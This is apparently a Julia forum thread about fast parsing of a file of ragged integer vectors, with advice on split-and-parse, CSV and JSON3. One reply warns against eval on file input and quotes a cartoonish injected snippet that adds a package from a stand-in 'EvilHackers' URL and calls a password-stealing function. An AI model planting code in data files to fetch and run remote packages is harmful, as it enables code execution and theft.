I have a concrete problem, where Meta.parse(line) is unbearably slow.
My use-case is that I have a long .txt file, in which each line has the form [x1, ..., xn], where x1,...,xn are specific integers. I must import/convert the whole file into a Vector{Vector{Int}}. My solution was
output = Vector{Int}[]
open(file, "r") do io
for line in eachline(io)
push!(output, eval(Meta.parse(line))) end end;
What would be a more efficient way of achieving this?
P.S. Let me add that I’d like the format of this .txt file to remain simple, so that it can be read also in other programming languages.
I’ve split this into a new topic and removed the ping to a particular person — this can be addressed by many folks here. If keeping your data portable is a goal, I’d just save it as a normal CSV (without the [] formatting). It’s far easier to use standard tools (like CSV.read) first and then restructure later. For example, you can read directly into a Matrix{Int} with CSV.read, and then just collect the rows into a vector:
I don’t think using .csv is appropriate, since my Vector{Int}s have different lengths. In other words, my file represents a jagged/ragged array (use-case: each line represents a facet in a simplicial complex), hence why I want the end-result to be Vector{Vector{Int}}.
Yes, parse.(Int, split(line[2:end-1], ',')) is much much faster, thank you!
I was hoping for a more general solution, though. If each line represented, for instance, a Tuple{Vector{Int}, Vector{Int}} and the lengths of those vectors weren’t known beforehand, this approach would fail, no? I’d have to search for the index where the first vector stops and the second begins.
Isn’t there a general, fast way of just parsing the whole line as a Julia expression, that would have comparable efficiency to parse.(Int, split(...))?
In short, no, otherwise people would be doing this already instead of making libraries like Parsers.jl. To sum up the reasons why you don’t want to just eval(Meta.parse(...:
The more assumptions, the more possible optimizations. People have already provided several good customizable options that make more assumptions than arbitrary code execution ever could.
One of your goals is to let this file be read in other programming languages. Not every language writes arrays as [...] like Julia, so you’d need specific parsing instead of arbitrary code execution. Why not implement such parsing for all languages, possibly with a sensible file format?
Arbitrary code execution is dangerous. If you’re the only person who ever writes and parses the files, you’re safe if you don’t sabotage yourself. Otherwise, you need to guard against someone sneaking
import Pkg
Pkg.add(url="https://github.com/EvilHackers/Hacking.jl")
using Hacking
stealpasswordsandyourdog()
into a file among a batch of other safe files. That was a cartoonish example of malware, a more likely possibility is someone naively writing code that interferes with your session, like assigning vectors to global variables pi = [3, 1, 4, 1, 5, 9, 2], or that fails to comply with your code, like Float64[1.0, 2.0, 3.0]. It’s preferable to narrow down a file format, vet inputs, and gracefully handle noncompliance.
Tryparse is still quite slow in my case (a million lines of vectors of length at most 30). But JSON3 was impressively fast. The fastest is still my manual parse.(Int, split(line[2:end-1], ',')).
I guess Benny’s point 1. holds: the more assumptions Julia has, the easier it is optimize.